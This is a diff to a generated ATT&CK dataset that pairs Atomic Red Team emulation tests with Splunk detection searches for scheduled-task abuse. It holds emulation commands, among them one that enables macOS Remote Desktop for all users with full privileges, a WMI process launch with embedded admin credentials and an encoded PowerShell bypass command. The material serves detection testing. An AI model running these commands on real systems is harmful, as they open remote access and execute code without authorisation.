diff --git a/data_collector/generated_attck_data_v3.json b/data_collector/generated_attck_data_v3.json index acd8cf2..8fbb73d 100644 --- a/data_collector/generated_attck_data_v3.json +++ b/data_collector/generated_attck_data_v3.json @@ -85928,8 +85928,8 @@ "dependencies": [ { "description": "File to copy must exist on disk at specified location (#{xml_path})\n", - "prereq_command": "if (Test-Path #{xml_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml\" -OutFile \"#{xml_path}\"\n" + "prereq_command": "if (Test-Path \"#{xml_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{xml_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_005_WMI.xml\" -OutFile \"#{xml_path}\"\n" } ], "executor": { @@ -85977,8 +85977,8 @@ "dependencies": [ { "description": "File to copy must exist on disk at specified location (#{xml_path})\n", - "prereq_command": "if (Test-Path #{xml_path}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{xml_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml\" -OutFile \"#{xml_path}\"\n" + "prereq_command": "if (Test-Path \"#{xml_path}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{xml_path}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml\" -OutFile \"#{xml_path}\"\n" } ], "executor": { @@ -87306,7 +87306,7 @@ { "name": "Short Lived Scheduled Task", "description": "The following analytic utilizes Windows Security EventCode 4698, \"A scheduled task was created,\" and EventCode 4699, \"A scheduled task was deleted,\" to identify scheduled tasks that are created and deleted within a short time frame of less than 30 seconds. This behavior is indicative of a potential lateral movement attack where the Task Scheduler is abused to achieve code execution. Both red teams and adversaries may exploit the Task Scheduler for lateral movement and remote code execution.\\\nTo implement this analytic, ensure that you are ingesting Windows Security Event Logs with EventCode 4698 enabled. Additionally, the Windows TA (Technology Add-on) is required to parse and extract the necessary information from the logs.\\\nIt's important to note that while uncommon, legitimate applications may create and delete scheduled tasks within a short duration. Analysts should filter the results based on the specific context and environment to reduce false positives.\\\nIdentifying short-lived scheduled tasks is valuable for a SOC as it can indicate malicious activities attempting to move laterally or execute unauthorized code on Windows systems. By detecting and investigating these events, security analysts can respond promptly to prevent further compromise and mitigate potential risks. The impact of a true positive could range from unauthorized access to data exfiltration or the execution of malicious payloads.", - "search": " `wineventlog_security` EventCode=4698 OR EventCode=4699 | xmlkv Message | transaction Task_Name startswith=(EventCode=4698) endswith=(EventCode=4699) | eval short_lived=case((duration<30),\"TRUE\") | search short_lived = TRUE | table _time, ComputerName, Account_Name, Command, Task_Name, short_lived | `short_lived_scheduled_task_filter` ", + "search": " `wineventlog_security` EventCode=4698 OR EventCode=4699 | xmlkv Message | transaction Task_Name startswith=(EventCode=4698) endswith=(EventCode=4699) | eval short_lived=case((duration<30),\"TRUE\") | search short_lived = TRUE | rename ComputerName as dest| table _time, dest, Account_Name, Command, Task_Name, short_lived | `short_lived_scheduled_task_filter` ", "tags": { "name": "Short Lived Scheduled Task", "analytic_story": [ @@ -87322,7 +87322,7 @@ "Installation", "Exploitation" ], - "message": "A windows scheduled task was created and deleted in 30 seconds on $ComputerName$", + "message": "A windows scheduled task was created and deleted in 30 seconds on $dest$", "mitre_attack_id": [ "T1053.005" ], @@ -87421,7 +87421,7 @@ "Installation", "Exploitation" ], - "message": "Suspicious scheduled task registered on $dest$", + "message": "Suspicious scheduled task registered on $dest$ from Public Directory", "mitre_attack_id": [ "T1053.005", "T1053" @@ -87438,7 +87438,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -88147,14 +88147,13 @@ } }, { - "name": "Windows Scheduled Task with Highest Privileges", - "description": "The following analytic detects the creation of a new task with the highest execution privilege via Schtasks.exe. This tactic is often observed in AsyncRAT attacks, where the scheduled task is used for persistence and privilege escalation. AsyncRAT sets up a scheduled task with parameters '/rl' and 'highest', triggering this technique. It's a strong indicator of potential malware or adversaries seeking to establish persistence and escalate privileges through scheduled tasks. This is crucial for a Security Operations Center (SOC) as it can prevent unauthorized system access and potential data breaches.\\\nThe analytic works by monitoring logs for process name, parent process, and command-line executions. In the presence of the '*/rl ' and ' highest *' commands in a schtasks.exe process, an alert is triggered.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = \"schtasks.exe\" Processes.process = \"*/rl *\" Processes.process = \"* highest *\" by Processes.process_name Processes.parent_process_name Processes.parent_process Processes.process Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_scheduled_task_with_highest_privileges_filter`", + "name": "Windows Scheduled Task Service Spawned Shell", + "description": "The following analytic identifies when the Task Scheduler service \"svchost.exe -k netsvcs -p -s Schedule\" is the parent process to common command line, scripting, or shell execution binaries. Attackers often abuse the task scheduler service with these binaries as an execution and persistence mechanism in order to blend in with normal Windows operations. This TTP is also commonly seen for legitimate purposes such as business scripts or application updates.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process=\"*\\\\system32\\\\svchost.exe*\" AND Processes.parent_process=\"*-k*\" AND Processes.parent_process= \"*netsvcs*\" AND Processes.parent_process=\"*-p*\" AND Processes.parent_process=\"*-s*\" AND Processes.parent_process=\"*Schedule*\" Processes.process_name IN(\"powershell.exe\", \"wscript.exe\", \"cscript.exe\", \"cmd.exe\", \"sh.exe\", \"ksh.exe\", \"zsh.exe\", \"bash.exe\", \"scrcons.exe\",\"pwsh.exe\") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.parent_process_name | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_scheduled_task_service_spawned_shell_filter`", "tags": { - "name": "Windows Scheduled Task with Highest Privileges", + "name": "Windows Scheduled Task Service Spawned Shell", "analytic_story": [ - "AsyncRAT", - "Scheduled Tasks" + "Windows Persistence Techniques" ], "asset_type": "Endpoint", "cis20": [ @@ -88164,10 +88163,10 @@ "Installation", "Exploitation" ], - "message": "a $process_name$ creating a schedule task $process$ with highest run level privilege in $dest$", + "message": "A windows scheduled task spawned the shell application $process_name$ on $dest$.", "mitre_attack_id": [ - "T1053", - "T1053.005" + "T1053.005", + "T1059" ], "nist": [ "DE.CM" @@ -88175,128 +88174,27 @@ "observable": [ { "name": "dest", - "type": "Hostname", + "type": "Endpoint", "role": [ "Victim" ] - } - ], - "risk_score": 64, - "security_domain": "endpoint", - "risk_severity": "medium", - "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1053", - "mitre_attack_technique": "Scheduled Task/Job", - "mitre_attack_tactics": [ - "Execution", - "Persistence", - "Privilege Escalation" - ], - "mitre_attack_groups": [ - "Earth Lusca" - ] }, { - "mitre_attack_id": "T1053.005", - "mitre_attack_technique": "Scheduled Task", - "mitre_attack_tactics": [ - "Execution", - "Persistence", - "Privilege Escalation" - ], - "mitre_attack_groups": [ - "APT-C-36", - "APT29", - "APT3", - "APT32", - "APT33", - "APT37", - "APT38", - "APT39", - "APT41", - "BITTER", - "BRONZE BUTLER", - "Blue Mockingbird", - "Chimera", - "Cobalt Group", - "Confucius", - "Dragonfly", - "FIN10", - "FIN6", - "FIN7", - "FIN8", - "Fox Kitten", - "GALLIUM", - "Gamaredon Group", - "HEXANE", - "Higaisa", - "Kimsuky", - "Lazarus Group", - "LuminousMoth", - "Machete", - "Magic Hound", - "Molerats", - "MuddyWater", - "Mustang Panda", - "Naikon", - "OilRig", - "Patchwork", - "Rancor", - "Silence", - "Stealth Falcon", - "TEMP.Veles", - "Wizard Spider", - "menuPass" - ] - } - ] - } - }, - { - "name": "Windows Schtasks Create Run As System", - "description": "The following analytic identifies the creation of a new task to start and run as an elevated user - SYSTEM using Schtasks.exe. This behavior is commonly used by adversaries to spawn a process in an elevated state. If a true positive is found, it suggests an attacker is attempting to persist within the environment or potentially deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes. Upon triage, review the scheduled task's source and the command to be executed. Capture and inspect any relevant on-disk artifacts, and look for concurrent processes to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks.", - "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_schtasks` Processes.process=\"*/create *\" AND Processes.process=\"*/ru *\" AND Processes.process=\"*system*\" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_schtasks_create_run_as_system_filter`", - "tags": { - "name": "Windows Schtasks Create Run As System", - "analytic_story": [ - "Windows Persistence Techniques", - "Qakbot", - "Scheduled Tasks" - ], - "asset_type": "Endpoint", - "cis20": [ - "CIS 10" - ], - "kill_chain_phases": [ - "Installation", - "Exploitation" - ], - "message": "An $process_name$ was created on endpoint $dest$ attempting to spawn as SYSTEM.", - "mitre_attack_id": [ - "T1053.005", - "T1053" - ], - "nist": [ - "DE.CM" - ], - "observable": [ - { - "name": "dest", - "type": "Hostname", + "name": "user", + "type": "User", "role": [ "Victim" ] }, { - "name": "process_name", - "type": "Process", + "name": "process", + "type": "Process Name", "role": [ - "Child Process" + "Attacker" ] } ], - "risk_score": 48, + "risk_score": 20, "security_domain": "endpoint", "risk_severity": "low", "mitre_attack_enrichments": [ @@ -88354,32 +88252,39 @@ ] }, { - "mitre_attack_id": "T1053", - "mitre_attack_technique": "Scheduled Task/Job", + "mitre_attack_id": "T1059", + "mitre_attack_technique": "Command and Scripting Interpreter", "mitre_attack_tactics": [ - "Execution", - "Persistence", - "Privilege Escalation" + "Execution" ], "mitre_attack_groups": [ - "Earth Lusca" + "APT19", + "APT32", + "APT37", + "APT39", + "Dragonfly", + "FIN5", + "FIN6", + "FIN7", + "Fox Kitten", + "Ke3chang", + "OilRig", + "Stealth Falcon", + "Whitefly", + "Windigo" ] } ] } }, { - "name": "WinEvent Scheduled Task Created to Spawn Shell", - "description": "The following query utilizes Windows Security EventCode 4698, indicating 'a scheduled task was created', to identify potentially suspicious tasks. These tasks may be registered on Windows through either schtasks.exe or TaskService, and are set up to execute a command with a native Windows shell such as PowerShell, Cmd, Wscript, or Cscript.\\\nThe search will return the initial and final times the task was registered, along with details like the 'Command' set to be executed, 'Task Name', 'Author', whether it's 'Enabled', and if it is 'Hidden'.\\\nSchtasks.exe is typically found in C:\\Windows\\system32 and C:\\Windows\\syswow64. The DLL 'taskschd.dll' is loaded when either schtasks.exe or TaskService is launched. If this DLL is found loaded by another process, it's possible that a scheduled task is being registered within the context of that process in memory.\\\nDuring triage, it's essential to identify the source of the scheduled task. Was it registered via schtasks.exe or TaskService? Review the job that was created and the command set to be executed. It's also recommended to capture and review any artifacts on disk, and identify any parallel processes within the same timeframe to locate the source.", - "search": "`wineventlog_security` EventCode=4698 | xmlkv Message | search Command IN (\"*powershell.exe*\", \"*wscript.exe*\", \"*cscript.exe*\", \"*cmd.exe*\", \"*sh.exe*\", \"*ksh.exe*\", \"*zsh.exe*\", \"*bash.exe*\", \"*scrcons.exe*\", \"*pwsh.exe*\") | stats count min(_time) as firstTime max(_time) as lastTime by dest, Task_Name, Command, Author, Enabled, Hidden | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `winevent_scheduled_task_created_to_spawn_shell_filter`", + "name": "Windows Scheduled Task with Highest Privileges", + "description": "The following analytic detects the creation of a new task with the highest execution privilege via Schtasks.exe. This tactic is often observed in AsyncRAT attacks, where the scheduled task is used for persistence and privilege escalation. AsyncRAT sets up a scheduled task with parameters '/rl' and 'highest', triggering this technique. It's a strong indicator of potential malware or adversaries seeking to establish persistence and escalate privileges through scheduled tasks. This is crucial for a Security Operations Center (SOC) as it can prevent unauthorized system access and potential data breaches.\\\nThe analytic works by monitoring logs for process name, parent process, and command-line executions. In the presence of the '*/rl ' and ' highest *' commands in a schtasks.exe process, an alert is triggered.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = \"schtasks.exe\" Processes.process = \"*/rl *\" Processes.process = \"* highest *\" by Processes.process_name Processes.parent_process_name Processes.parent_process Processes.process Processes.process_guid Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_scheduled_task_with_highest_privileges_filter`", "tags": { - "name": "WinEvent Scheduled Task Created to Spawn Shell", + "name": "Windows Scheduled Task with Highest Privileges", "analytic_story": [ - "Ransomware", - "Windows Persistence Techniques", - "Winter Vivern", - "Ryuk Ransomware", - "CISA AA22-257A", + "AsyncRAT", "Scheduled Tasks" ], "asset_type": "Endpoint", @@ -88390,10 +88295,10 @@ "Installation", "Exploitation" ], - "message": "A windows scheduled task was created (task name=$Task_Name$) on $dest$ by the following command: $Command$", + "message": "a $process_name$ creating a schedule task $process$ with highest run level privilege in $dest$", "mitre_attack_id": [ - "T1053.005", - "T1053" + "T1053", + "T1053.005" ], "nist": [ "DE.CM" @@ -88401,76 +88306,16 @@ "observable": [ { "name": "dest", - "type": "Endpoint", + "type": "Hostname", "role": [ "Victim" ] - }, - { - "name": "Command", - "type": "Unknown", - "role": [ - "Target" - ] } ], - "risk_score": 70, + "risk_score": 64, "security_domain": "endpoint", "risk_severity": "medium", "mitre_attack_enrichments": [ - { - "mitre_attack_id": "T1053.005", - "mitre_attack_technique": "Scheduled Task", - "mitre_attack_tactics": [ - "Execution", - "Persistence", - "Privilege Escalation" - ], - "mitre_attack_groups": [ - "APT-C-36", - "APT29", - "APT3", - "APT32", - "APT33", - "APT37", - "APT38", - "APT39", - "APT41", - "BITTER", - "BRONZE BUTLER", - "Blue Mockingbird", - "Chimera", - "Cobalt Group", - "Confucius", - "Dragonfly", - "FIN10", - "FIN6", - "FIN7", - "FIN8", - "Fox Kitten", - "GALLIUM", - "Gamaredon Group", - "HEXANE", - "Higaisa", - "Kimsuky", - "Lazarus Group", - "LuminousMoth", - "Machete", - "Magic Hound", - "Molerats", - "MuddyWater", - "Mustang Panda", - "Naikon", - "OilRig", - "Patchwork", - "Rancor", - "Silence", - "Stealth Falcon", - "TEMP.Veles", - "Wizard Spider", - "menuPass" - ] - }, { "mitre_attack_id": "T1053", "mitre_attack_technique": "Scheduled Task/Job", @@ -88482,66 +88327,353 @@ "mitre_attack_groups": [ "Earth Lusca" ] - } - ] - } - }, - { - "name": "WinEvent Scheduled Task Created Within Public Path", - "description": "The following analytic utilizes Windows Security EventCode 4698, which indicates the creation of a scheduled task on a Windows system. The purpose of this query is to identify suspicious tasks that have been registered using either schtasks.exe or TaskService and involve executing a command from a user-writable file path.\\\nWhen this analytic is triggered, it provides information such as the first and last registration time of the task, the command to be executed, the task name, author, and whether it is set as hidden or not. It is worth noting that schtasks.exe is commonly located in C:\\Windows\\system32 and C:\\Windows\\syswow64, and it loads the taskschd.dll DLL when launched. If this DLL is loaded by another process, it suggests that a scheduled task may be registered within that process's context in memory.\\\nDuring the triage process, it is essential to identify the source of the scheduled task creation, whether it was initiated through schtasks.exe or TaskService. The analyst should review the task that was created, including the command to be executed. Additionally, any artifacts on disk related to the task should be captured and analyzed. It is also recommended to identify any parallel processes that occurred within the same timeframe to determine the source of the task creation.\\\nBy conducting this triage process, security analysts can gain insights into potentially malicious or suspicious scheduled tasks, helping them identify the source and assess the impact of the task. This analytic is valuable for a Security Operations Center (SOC) as it can detect unauthorized or suspicious activity that could indicate an attacker's attempt to establish persistence or execute unauthorized commands on the system.\\", - "search": "`wineventlog_security` EventCode=4698 | xmlkv Message | search Command IN (\"*\\\\users\\\\public\\\\*\", \"*\\\\programdata\\\\*\", \"*\\\\temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\appdata\\\\*\", \"*\\\\perflogs\\\\*\") | stats count min(_time) as firstTime max(_time) as lastTime by dest, Task_Name, Command, Author, Enabled, Hidden | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `winevent_scheduled_task_created_within_public_path_filter`", - "tags": { - "name": "WinEvent Scheduled Task Created Within Public Path", - "analytic_story": [ - "Ransomware", - "Windows Persistence Techniques", - "Winter Vivern", - "Prestige Ransomware", - "AsyncRAT", - "Ryuk Ransomware", - "IcedID", - "CISA AA22-257A", - "Industroyer2", - "Active Directory Lateral Movement", - "Data Destruction", - "Scheduled Tasks" - ], - "asset_type": "Endpoint", - "cis20": [ - "CIS 10" - ], - "kill_chain_phases": [ - "Installation", - "Exploitation" - ], - "message": "A windows scheduled task was created (task name=$Task_Name$) on $dest$ by the following command: $Command$", - "mitre_attack_id": [ - "T1053.005", - "T1053" - ], - "nist": [ - "DE.CM" - ], - "observable": [ - { - "name": "dest", - "type": "Endpoint", - "role": [ - "Victim" - ] }, - { - "name": "Command", - "type": "Unknown", - "role": [ - "Target" - ] - } - ], - "risk_score": 70, - "security_domain": "endpoint", - "risk_severity": "medium", - "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1053.005", + "mitre_attack_technique": "Scheduled Task", + "mitre_attack_tactics": [ + "Execution", + "Persistence", + "Privilege Escalation" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "BITTER", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "Dragonfly", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "HEXANE", + "Higaisa", + "Kimsuky", + "Lazarus Group", + "LuminousMoth", + "Machete", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Naikon", + "OilRig", + "Patchwork", + "Rancor", + "Silence", + "Stealth Falcon", + "TEMP.Veles", + "Wizard Spider", + "menuPass" + ] + } + ] + } + }, + { + "name": "Windows Schtasks Create Run As System", + "description": "The following analytic identifies the creation of a new task to start and run as an elevated user - SYSTEM using Schtasks.exe. This behavior is commonly used by adversaries to spawn a process in an elevated state. If a true positive is found, it suggests an attacker is attempting to persist within the environment or potentially deliver additional malicious payloads, leading to data theft, ransomware, or other damaging outcomes. Upon triage, review the scheduled task's source and the command to be executed. Capture and inspect any relevant on-disk artifacts, and look for concurrent processes to identify the attack source. This approach helps analysts detect potential threats earlier and mitigate the risks.", + "search": "| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_schtasks` Processes.process=\"*/create *\" AND Processes.process=\"*/ru *\" AND Processes.process=\"*system*\" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_schtasks_create_run_as_system_filter`", + "tags": { + "name": "Windows Schtasks Create Run As System", + "analytic_story": [ + "Windows Persistence Techniques", + "Qakbot", + "Scheduled Tasks" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation", + "Exploitation" + ], + "message": "An $process_name$ was created on endpoint $dest$ attempting to spawn as SYSTEM.", + "mitre_attack_id": [ + "T1053.005", + "T1053" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Hostname", + "role": [ + "Victim" + ] + }, + { + "name": "process_name", + "type": "Process", + "role": [ + "Child Process" + ] + } + ], + "risk_score": 48, + "security_domain": "endpoint", + "risk_severity": "low", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1053.005", + "mitre_attack_technique": "Scheduled Task", + "mitre_attack_tactics": [ + "Execution", + "Persistence", + "Privilege Escalation" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "BITTER", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "Dragonfly", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "HEXANE", + "Higaisa", + "Kimsuky", + "Lazarus Group", + "LuminousMoth", + "Machete", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Naikon", + "OilRig", + "Patchwork", + "Rancor", + "Silence", + "Stealth Falcon", + "TEMP.Veles", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1053", + "mitre_attack_technique": "Scheduled Task/Job", + "mitre_attack_tactics": [ + "Execution", + "Persistence", + "Privilege Escalation" + ], + "mitre_attack_groups": [ + "Earth Lusca" + ] + } + ] + } + }, + { + "name": "WinEvent Scheduled Task Created to Spawn Shell", + "description": "The following query utilizes Windows Security EventCode 4698, indicating 'a scheduled task was created', to identify potentially suspicious tasks. These tasks may be registered on Windows through either schtasks.exe or TaskService, and are set up to execute a command with a native Windows shell such as PowerShell, Cmd, Wscript, or Cscript.\\\nThe search will return the initial and final times the task was registered, along with details like the 'Command' set to be executed, 'Task Name', 'Author', whether it's 'Enabled', and if it is 'Hidden'.\\\nSchtasks.exe is typically found in C:\\Windows\\system32 and C:\\Windows\\syswow64. The DLL 'taskschd.dll' is loaded when either schtasks.exe or TaskService is launched. If this DLL is found loaded by another process, it's possible that a scheduled task is being registered within the context of that process in memory.\\\nDuring triage, it's essential to identify the source of the scheduled task. Was it registered via schtasks.exe or TaskService? Review the job that was created and the command set to be executed. It's also recommended to capture and review any artifacts on disk, and identify any parallel processes within the same timeframe to locate the source.", + "search": "`wineventlog_security` EventCode=4698 | xmlkv Message | search Command IN (\"*powershell.exe*\", \"*wscript.exe*\", \"*cscript.exe*\", \"*cmd.exe*\", \"*sh.exe*\", \"*ksh.exe*\", \"*zsh.exe*\", \"*bash.exe*\", \"*scrcons.exe*\", \"*pwsh.exe*\") | stats count min(_time) as firstTime max(_time) as lastTime by dest, Task_Name, Command, Author, Enabled, Hidden | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `winevent_scheduled_task_created_to_spawn_shell_filter`", + "tags": { + "name": "WinEvent Scheduled Task Created to Spawn Shell", + "analytic_story": [ + "Ransomware", + "Windows Persistence Techniques", + "Winter Vivern", + "Ryuk Ransomware", + "CISA AA22-257A", + "Scheduled Tasks", + "Windows Error Reporting Service Elevation of Privilege Vulnerability" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation", + "Exploitation" + ], + "message": "A windows scheduled task was created (task name=$Task_Name$) on $dest$ by the following command: $Command$", + "mitre_attack_id": [ + "T1053.005", + "T1053" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + }, + { + "name": "Command", + "type": "Unknown", + "role": [ + "Target" + ] + } + ], + "risk_score": 70, + "security_domain": "endpoint", + "risk_severity": "medium", + "mitre_attack_enrichments": [ + { + "mitre_attack_id": "T1053.005", + "mitre_attack_technique": "Scheduled Task", + "mitre_attack_tactics": [ + "Execution", + "Persistence", + "Privilege Escalation" + ], + "mitre_attack_groups": [ + "APT-C-36", + "APT29", + "APT3", + "APT32", + "APT33", + "APT37", + "APT38", + "APT39", + "APT41", + "BITTER", + "BRONZE BUTLER", + "Blue Mockingbird", + "Chimera", + "Cobalt Group", + "Confucius", + "Dragonfly", + "FIN10", + "FIN6", + "FIN7", + "FIN8", + "Fox Kitten", + "GALLIUM", + "Gamaredon Group", + "HEXANE", + "Higaisa", + "Kimsuky", + "Lazarus Group", + "LuminousMoth", + "Machete", + "Magic Hound", + "Molerats", + "MuddyWater", + "Mustang Panda", + "Naikon", + "OilRig", + "Patchwork", + "Rancor", + "Silence", + "Stealth Falcon", + "TEMP.Veles", + "Wizard Spider", + "menuPass" + ] + }, + { + "mitre_attack_id": "T1053", + "mitre_attack_technique": "Scheduled Task/Job", + "mitre_attack_tactics": [ + "Execution", + "Persistence", + "Privilege Escalation" + ], + "mitre_attack_groups": [ + "Earth Lusca" + ] + } + ] + } + }, + { + "name": "WinEvent Scheduled Task Created Within Public Path", + "description": "The following analytic utilizes Windows Security EventCode 4698, which indicates the creation of a scheduled task on a Windows system. The purpose of this query is to identify suspicious tasks that have been registered using either schtasks.exe or TaskService and involve executing a command from a user-writable file path.\\\nWhen this analytic is triggered, it provides information such as the first and last registration time of the task, the command to be executed, the task name, author, and whether it is set as hidden or not. It is worth noting that schtasks.exe is commonly located in C:\\Windows\\system32 and C:\\Windows\\syswow64, and it loads the taskschd.dll DLL when launched. If this DLL is loaded by another process, it suggests that a scheduled task may be registered within that process's context in memory.\\\nDuring the triage process, it is essential to identify the source of the scheduled task creation, whether it was initiated through schtasks.exe or TaskService. The analyst should review the task that was created, including the command to be executed. Additionally, any artifacts on disk related to the task should be captured and analyzed. It is also recommended to identify any parallel processes that occurred within the same timeframe to determine the source of the task creation.\\\nBy conducting this triage process, security analysts can gain insights into potentially malicious or suspicious scheduled tasks, helping them identify the source and assess the impact of the task. This analytic is valuable for a Security Operations Center (SOC) as it can detect unauthorized or suspicious activity that could indicate an attacker's attempt to establish persistence or execute unauthorized commands on the system.\\", + "search": "`wineventlog_security` EventCode=4698 | xmlkv Message | search Command IN (\"*\\\\users\\\\public\\\\*\", \"*\\\\programdata\\\\*\", \"*\\\\temp\\\\*\", \"*\\\\Windows\\\\Tasks\\\\*\", \"*\\\\appdata\\\\*\", \"*\\\\perflogs\\\\*\") | stats count min(_time) as firstTime max(_time) as lastTime by dest, Task_Name, Command, Author, Enabled, Hidden | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `winevent_scheduled_task_created_within_public_path_filter`", + "tags": { + "name": "WinEvent Scheduled Task Created Within Public Path", + "analytic_story": [ + "Ransomware", + "Windows Persistence Techniques", + "Winter Vivern", + "Prestige Ransomware", + "AsyncRAT", + "Ryuk Ransomware", + "IcedID", + "CISA AA22-257A", + "Industroyer2", + "Active Directory Lateral Movement", + "Data Destruction", + "Scheduled Tasks" + ], + "asset_type": "Endpoint", + "cis20": [ + "CIS 10" + ], + "kill_chain_phases": [ + "Installation", + "Exploitation" + ], + "message": "A windows scheduled task was created (task name=$Task_Name$) on $dest$ by the following command: $Command$", + "mitre_attack_id": [ + "T1053.005", + "T1053" + ], + "nist": [ + "DE.CM" + ], + "observable": [ + { + "name": "dest", + "type": "Endpoint", + "role": [ + "Victim" + ] + }, + { + "name": "Command", + "type": "Unknown", + "role": [ + "Target" + ] + } + ], + "risk_score": 70, + "security_domain": "endpoint", + "risk_severity": "medium", + "mitre_attack_enrichments": [ { "mitre_attack_id": "T1053.005", "mitre_attack_technique": "Scheduled Task", @@ -89750,16 +89882,16 @@ "observable": [ { "name": "dest", - "type": "Hostname", + "type": "Endpoint", "role": [ "Victim" ] }, { - "name": "SourceImage", - "type": "Process", + "name": "user", + "type": "User", "role": [ - "Attacker" + "Victim" ] } ], @@ -90431,10 +90563,37 @@ "phase_name": "lateral-movement" } ], - "command_list": [], + "command_list": [ + "sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allowAccessFor -allUsers -privs -all -quiet\n" + ], "commands": [], "queries": [], - "parsed_datasets": [], + "parsed_datasets": [ + { + "source": "atomics/T1021.005/T1021.005.yaml", + "name": "Atomic Red Team Test - Remote Services:VNC", + "content": { + "attack_technique": "T1021.005", + "display_name": "Remote Services:VNC", + "atomic_tests": [ + { + "name": "Enable Apple Remote Desktop Agent", + "auto_generated_guid": "8a930abe-841c-4d4f-a877-72e9fe90b9ea", + "description": "ARD leverages a blend of protocols, including VNC to send the screen and control buffers and SSH for secure file transfer. \nAdversaries can abuse ARD to gain remote code execution and perform lateral movement.\n\nReferences: https://www.mandiant.com/resources/blog/leveraging-apple-remote-desktop-for-good-and-evil\n", + "supported_platforms": [ + "macos" + ], + "executor": { + "name": "sh", + "command": "sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -allowAccessFor -allUsers -privs -all -quiet\n", + "cleanup_command": "sudo /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -deactivate -stop -configure -privs -none -quiet\n", + "elevation_required": true + } + } + ] + } + } + ], "possible_detections": [ { "technique_id": "T1021.005", @@ -92227,7 +92386,7 @@ "wmic /user:DOMAIN\\Administrator /password:P@ssw0rd1 /node:\"127.0.0.1\" process call create notepad.exe\n", "powershell -exec bypass -e SQBuAHYAbwBrAGUALQBXAG0AaQBNAGUAdABoAG8AZAAgAC0AUABhAHQAaAAgAHcAaQBuADMAMgBfAHAAcgBvAGMAZQBzAHMAIAAtAE4AYQBtAGUAIABjAHIAZQBhAHQAZQAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIABuAG8AdABlAHAAYQBkAC4AZQB4AGUA\n", "$Class = New-Object Management.ManagementClass(New-Object Management.ManagementPath(\"Win32_Process\"))\n$NewClass = 